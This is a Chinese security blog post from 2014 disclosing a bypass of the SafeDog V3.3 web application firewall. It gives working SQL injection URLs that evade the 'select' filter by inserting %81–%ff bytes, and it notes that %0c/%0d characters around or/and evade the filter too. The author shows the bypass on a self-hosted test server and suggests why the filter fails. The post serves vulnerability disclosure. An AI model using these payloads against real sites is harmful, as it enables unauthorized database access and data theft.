记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

安全狗最新版V3.3绕过拦截注入漏洞

2014-11-15 16:31

最新版安全狗的拦截过滤存在问题,导致可以绕过拦截进行注入

本来我只是在V3.1版本上发现了该漏洞,升级到较新的V3.2发现漏洞修复,但是刚才试了最新的V3.3版本,才发现3.3版本那个漏洞又出来了,具体如下:




对于Select from 的拦截可在 select 前后或中间插入 %81~%ff,即可绕过拦截注入



如:
 


?id=1%20union%20sel%81ect%201,2%20from%20admin

?id=1%20union%20select%81%201,2%20from%20admin

?id=1%20union%20%81select%201,2%20from%20admin



这三种形式,都可突破拦截注入



另外,对于or and 这种简单拦截 在or and 前后加 %0c 或%0d 这一点所有版本都存在,希望下次更新能修补。

测试环境:windows2003+iis6.0+V3.3狗


程序:asp连数库(输出当前查询语句并显示查询结果)



为了证明漏洞,我在自己的服务器上装了最新版本V3.3,下面看结果

(图中都是3.3版本的)

首页先看正常注入:

语句:?id=0%20union%20select%201,2%20from%20admin

被拦截如图:
 

0001.jpg



然后插入%81进行突破

语句:?id=1%20union%20select%81%201,2%20from%20admin

爆出字段1,2,狗未拦截如图:
 

0002.jpg




 

修复方案:

该漏洞在V3.1上测试出来,V3.2不存在(但可以进行猜表注入),最新的V3.3竟然又有了,真不知道怎么更新的。



对于漏洞的产生,我想,开发者首先用正则先匹配select是否存在。然后再对%81~%ff之间的字符过滤,这样就犯了逻辑上的错误,应该是先过滤再匹配吧!



最后再说下,发现安全狗更新检查有问题,从3.1更新到3.2后,再更新提示是最新版本,然而在官方下的竟然是3.3版本,希望注意下。

知识来源: www.2cto.com/Article/201411/350128.html

阅读:72021 | 评论:0 | 标签:注入 漏洞 安全狗

想收藏或者和大家分享这篇好文章→复制链接地址

“安全狗最新版V3.3绕过拦截注入漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云